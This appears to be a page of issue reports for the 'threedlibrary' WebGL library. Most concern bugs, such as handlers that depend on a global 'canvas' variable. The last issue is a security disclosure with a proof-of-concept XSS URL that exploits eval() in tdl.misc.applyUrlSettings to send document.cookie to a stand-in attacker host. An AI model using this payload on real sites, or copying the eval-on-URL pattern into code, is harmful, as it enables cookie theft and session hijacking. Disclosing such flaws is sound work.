ellayunyun / threedlibrary Goto Github PK

in tdl.error: move window.dump behind the window.console condition

webgl.js registerContextLostHandler and registerContextRestoredHandler 
reference window.canvas

See lines 197 and 206:

http://code.google.com/p/threedlibrary/source/browse/tdl/webgl.js?spec=svn96ae27
81ac090bbdc8fc02c1897a0cf440de6da7&r=96ae2781ac090bbdc8fc02c1897a0cf440de6da7

This is fixed in the version used in 
http://webglsamples.googlecode.com/hg/aquarium/aquarium.html

If you have those changes, could you please push them to this repo? Thanks.

What steps will reproduce the problem?
When you don't name canvas variable as "canvas"
i.e., assume you have a canvas component with id canvas and you refer it with a 
variable named "canvas1":
var canvas1 = document.getElementById("canvas");
instead of "canvas"
var canvas = document.getElementById("canvas");
then registerContextLostHandler or registerContextRestoredHandler will crash
since they access variable "canvas" which is not one of the input parameter, so 
if you declare variable name as canvas, they will access it as a global 
variable; and if you don't the variable is undefined.
They shouldn't access canvas this way

What steps will reproduce the problem?
1.
2.
3.

What is the expected output? What do you see instead?


What version of the product are you using? On what operating system?


Please provide any additional information below.

I've fixed this in my clone here: 
https://code.google.com/r/axisofentropy-threedlibrary/source/detail?r=23ec5db0c9
f6705286828ea72b998a84fc5eb318

but I don't see how to do a "pull request" on Google Code.

What steps will reproduce the problem?
1. Follow this link 
http://webglsamples.googlecode.com/hg/aquarium/aquarium.html?webgl=document.crea
teElement('img').src%3d'http://xss.attacker.net/xss.php?'+document.cookie
2. Use Chrome debugger or similar to monitor net traffic


What is the expected output? What do you see instead?
In the debugger you should see only requests to googlecode.com. 
However, you will see a 404 GET to xss.attacker.com, with your cookies 
attached. Fortunately for you in this exploit code, googlecode does not seem to 
attach any cookies, but most sites will. 

Attacker can run arbitrary script in user's with the privileges of the web page.

What version of the product are you using? On what operating system?

Please provide any additional information below.
tdl.misc.applyUrlSettings parses the url string and calls eval() on the value 
of the webgl query parameter, if present. Party on Garth.